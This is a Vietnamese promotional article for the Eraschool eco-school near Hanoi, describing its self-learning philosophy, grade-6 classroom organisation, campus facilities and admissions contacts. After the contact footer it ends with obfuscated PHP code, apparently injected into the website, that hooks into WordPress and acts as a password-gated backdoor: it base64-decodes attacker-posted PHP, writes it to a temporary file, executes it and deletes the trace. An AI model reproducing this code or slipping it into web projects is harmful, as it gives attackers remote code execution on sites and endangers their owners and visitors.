Quy tắc tổ chức lớp học của lớp 6 tại trường sinh thái Eraschool

post

Với triết lý giáo dục hiện đại: “tự học – tự giáo dục” và “tự làm ra chính mình”, quy tắc tổ chức lớp học tại trường sinh thái Eraschool có rất nhiều điểm đặc biệt so với các trường học khác trên địa bàn thành phố. Vậy ở Eraschool có những nét ấn tượng gì? Quy tắc tổ chức lớp học của lớp 6 tại đây độc đáo như thế nào? Mời ba mẹ cùng theo dõi bài viết dưới đây để tìm hiểu cụ thể hơn nhé! 

Vài nét về trường sinh thái Eraschool

Eraschool tạo điều kiện cho trẻ học từ thiên nhiên, học giữa thiên nhiên 
Eraschool tạo điều kiện cho trẻ học từ thiên nhiên, học giữa thiên nhiên

Trường sinh thái Eraschool được gây dựng nền móng từ năm 2008 với mong muốn cải thiện khả năng vui chơi, học tập và trải nghiệm cho trẻ. Đây là ngôi trường nằm giữa thiên nhiên với tổng diện tích lên tới 20.000 m2, được thiết kế nhằm mang lại môi trường học gần gũi thiên nhiên, giúp học sinh được phát triển cả về thể chất và tâm hồn. 

Ngay từ khi mới thành lập, Eraschool đã theo đuổi triết lý giáo dục hiện đại: tự học – tự giáo dục và tự làm ra chính mình. Nhà trường đã đặt mục tiêu và xây dựng chương trình đào tạo theo hướng giúp trẻ được phát triển toàn diện cả về lối sống, trí tuệ, thể chất, thẩm mỹ. Vì vậy ở Eraschool, trẻ không học tập một cách thụ động mà được khuyến khích tự học, tự tìm tòi để chủ động tiếp thu tri thức cũng như rèn luyện tính tự lập. 

Ngoài ra, do được định hướng phát triển theo mô hình trường học sinh thái nên ở Eraschool, trẻ còn được khuyến khích tham gia vào các hành động xanh, từ đó sớm được nâng cao tinh thần trách nhiệm với cộng đồng. 

Quy tắc tổ chức lớp học ở Eraschool

Các em học sinh cấp 2 đang tham gia lớp học nghệ thuật tại trường 
Các em học sinh cấp 2 đang tham gia lớp học nghệ thuật tại trường

Quy tắc tổ chức lớp học ở trường sinh thái Eraschool rất đặc biệt do được xây dựng trên cơ sở tư tưởng giáo dục khai phóng, nhân văn và hiện đại, phù hợp với xu hướng phát triển trên thế giới. Tại Eraschool, dù trẻ theo học hệ đào tạo song ngữ hay quốc tế thì quy tắc tổ chức lớp học đều giống nhau và phù hợp với đặc điểm của mô hình trường học sinh thái nói chung. Theo đó, lớp học sẽ được tổ chức theo hướng gần gũi với thiên nhiên nhất có thể và trẻ được khuyến khích học từ thiên nhiên, học giữa thiên nhiên để được kích thích khả năng sáng tạo. 

Các khu học tập và hoạt động cho học sinh lớp 6 tại trường

Học sinh được học vật lý thiên văn với các thiết bị hiện đại 
Học sinh được học vật lý thiên văn với các thiết bị hiện đại

Để phục vụ nhu cầu dạy và học chương trình giáo dục sinh thái theo định hướng giáo dục của nhà trường, khuôn viên hơn 20.000 m2 của trường sinh thái Eraschool được chia thành nhiều khu học tập và hoạt động cho mọi cấp học, bao gồm: 

    • Công viên khoa học: Gồm khu vật nuôi, khu vườn ươm, khu đa dạng sinh học suối nhân tạo, khu Trung tâm thực nghiệm khoa học. Khu vực này được thiết kế gắn liền với thiên nhiên nhằm giúp các em học sinh có cơ hội tiếp cận tối đa môi trường học tập tự nhiên. 
  • Khu hoạt động ngoài trời: Hồ cá Koi, vườn hồng trên mái nhà, bể bơi, sân bóng nhân tạo, vườn vật lý thiên văn. Trong đó khu vực dạy và học thiên văn học rất được chú trọng với công viên thiên văn được đặt trên nóc tòa nhà học tập 5 tầng. 
  • Khu hoạt động trong nhà: Xưởng mộc, xưởng gốm, xưởng thủ công, nghệ thuật, phòng thí nghiệm vật lý, sinh học, hóa học, công nghệ Robotic, toán học, phòng quay Studio, khu thực hành kỹ năng cuộc sống, thư viện. 
  • Khu hoạt động tập thể: sân cỏ, sân khấu lớn, nhà thể chất, phòng đa năng, khu thực hành cuộc sống. Riêng khu học tập thể thao và tổ chức sự kiện trong nhà có sức chứa lên đến vài trăm học sinh và phụ huynh. 

Trên đây là vài nét cơ bản về trường sinh thái Eraschool cũng như quy tắc tổ chức lớp học độc đáo của nhà trường. Nếu ba mẹ có lịch tuyển sinh vào lớp 6 tại đây nhưng còn thắc mắc về quy trình, thủ tục liên quan, đừng ngần ngại gọi tới hotline 0899.889.818 trực 24/7 của nhà trường để được tư vấn hỗ trợ sớm nhất nhé! 

Đông Cao, Tráng Việt, Mê Linh, Hà Nội

tuyensinh1@eraschool.edu.vn

0899 889 818

eraschool.edu.vn

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}